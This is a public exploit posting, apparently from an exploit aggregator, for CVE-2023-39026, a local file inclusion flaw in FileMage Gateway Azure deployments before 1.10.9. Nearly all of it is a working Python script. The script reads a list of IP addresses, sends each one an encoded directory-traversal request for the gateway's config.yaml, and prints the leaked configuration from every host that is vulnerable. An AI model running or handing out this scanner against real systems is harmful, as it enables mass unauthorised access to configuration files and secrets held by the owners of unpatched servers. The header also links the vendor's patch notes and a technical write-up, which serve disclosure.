Share
## https://sploitus.com/exploit?id=PACKETSTORM:174491
# Exploit Title: FileMage Gateway 1.10.9 - Local File Inclusion  
# Date: 8/22/2023  
# Exploit Author: Bryce "Raindayzz" Harty   
# Vendor Homepage: https://www.filemage.io/  
# Version: Azure Versions < 1.10.9  
# Tested on: All Azure deployments < 1.10.9   
# CVE : CVE-2023-39026  
  
# Technical Blog - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html  
# Patch from vendor - https://www.filemage.io/docs/updates.html  
  
import requests  
import warnings  
warnings.filterwarnings("ignore")  
def worker(url):  
response = requests.get(url, verify=False, timeout=.5)  
return response  
def main():  
listIP = []  
file_path = input("Enter the path to the file containing the IP addresses: ")  
with open(file_path, 'r') as file:  
ip_list = file.read().splitlines()  
searchString = "tls"  
for ip in ip_list:  
url = f"https://{ip}" + "/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cprogramdata%5cfilemage%5cgateway%5cconfig.yaml"  
try:  
response = worker(url)  
#print(response.text)  
if searchString in response.text:  
print("Vulnerable IP: " + ip)  
print(response.text)  
listIP.append(ip)  
except requests.exceptions.RequestException as e:   
print(f"Error occurred for {ip}: {str(e)}")  
  
for x in listIP:  
print(x)  
if __name__ == '__main__':  
main()